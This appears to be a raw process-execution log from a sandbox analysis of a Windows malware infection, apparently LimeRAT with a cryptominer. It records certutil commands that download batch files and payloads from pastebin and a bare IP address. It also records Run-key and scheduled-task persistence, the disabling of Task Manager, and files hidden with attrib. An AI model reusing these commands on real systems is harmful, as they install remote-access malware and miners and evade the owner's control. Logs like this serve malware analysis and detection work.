cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\E3A9.tmp\E3AA.bat C:\Users\test22\AppData\Local\Temp\updateW\windowsapp.exe"
3068certutil.exe certutil -urlcache -split -f https://pastebin.com/raw/GUqDzHQW C:\Users\test22\AppData\Local\Temp\version.bat
2156certutil.exe certutil -urlcache -split -f https://pastebin.com/raw/h6SvjTQp C:\Users\test22\AppData\Local\Temp\hosting.bat
2276certutil.exe certutil -urlcache -split -f https://pastebin.com/raw/DVn2TV4Q C:\Users\test22\AppData\Local\Temp\versioncd.bat
196cmd.exe cmd /c del "C:\Users\test22\AppData\Local\Temp\hosting.bat"
2608cmd.exe cmd /c del "C:\Users\test22\AppData\Local\Temp\version.bat"
2740cmd.exe cmd /c del "C:\Users\test22\AppData\Local\Temp\versioncd.bat"
2976WMIC.exe wmic process where ExecutablePath='C:\\Windows (x86)\\explorer.exe' delete
2896WMIC.exe wmic process where name='taskmgr.exe' delete
1664WMIC.exe wmic process where name='Taskmgr.exe' delete
2264WMIC.exe wmic process where name='xmrig.exe' delete
2296reg.exe REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
2456reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Windows Logons" /t REG_SZ /F /D "C:\Windows (x86)\explorer.exe"
204reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Windows Updates" /t REG_SZ /F /D "C:\Users\test22\AppData\Roaming\AppData\Windows Updates\winupdate.exe"
1756wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\updateW\z.vbs"
2568wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\z.vbs"
192wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\updateW\helps.vbs"
2860wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\helps.vbs"
2840schtasks.exe schtasks /create /f /sc ONLOGON /RL HIGHEST /tn LimeRAT-Admin /tr "'C:\Users\test22\AppData\Roaming\AppData\Windows Protector\winlogins.exe'"
2828winlogins.exe "C:\Users\test22\AppData\Roaming\AppData\Windows Protector\winlogins.exe"
2256xcopy.exe xcopy /y "C:\Users\test22\AppData\Local\Temp\updateW\winupdate.exe" "C:\Users\test22\AppData\Roaming\AppData\Windows Updates"
3056attrib.exe attrib +s +h "C:\Users\test22\AppData\Roaming\AppData\Windows Updates\*.*"
1660attrib.exe attrib +s +h "C:\Users\test22\AppData\Roaming\AppData\Windows Updates"
2104attrib.exe attrib +s +h "C:\Users\test22\AppData\Roaming\AppData\Windows Protector\*.*"
2416attrib.exe attrib +s +h "C:\Users\test22\AppData\Roaming\AppData\Windows Protector"
792attrib.exe attrib -s -h "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.*"
2212xcopy.exe xcopy /y "C:\Users\test22\AppData\Local\Temp\updateW\Microsoft.com" "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
2604attrib.exe attrib +s +h "C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\*.*"
2916WMIC.exe wmic process where ExecutablePath='C:\\Windows (x86)\\explorer.exe' delete
2352attrib.exe attrib -s -h "C:\Windows (x86)\*.*"
2632certutil.exe certutil -urlcache -split -f "http://54.254.238.33/xm/win.com" C:\Users\test22\AppData\Local\Temp\updateW\win.com
2940certutil.exe certutil -urlcache -split -f "http://54.254.238.33/xm/64a1.com" C:\Users\test22\AppData\Local\Temp\updateW\64a1.com
3232cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\B4B4.tmp\B4C5.bat "C:\Windows (x86)\xagal.exe""
4008certutil.exe certutil -urlcache -split -f https://pastebin.com/raw/GUqDzHQW "C:\Windows (x86)\version.bat"
176cmd.exe cmd /c del "C:\Windows (x86)\version.bat"
3244cmd.exe C:\Windows\system32\cmd.exe /c wmic datafile where "name='C:\\Windows (x86)\\explorer.exe'" get version /format:list
2320WMIC.exe wmic datafile where "name='C:\\Windows (x86)\\explorer.exe'" get version /format:list
3532WMIC.exe wmic process where name='xagal.exe' delete
2328explorer.exe "C:\Windows (x86)\explorer.exe"
3836cmd.exe cmd /c del "C:\Windows (x86)\xcls.bat"
1968win.com "C:\Users\test22\AppData\Local\Temp\updateW\win.com"
3648PING.EXE ping 127.0.0.1 -n 5
3848wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Local\Temp\updateW\runx.vbs"
296WMIC.exe wmic process where name='windowsapp.exe' delete
2072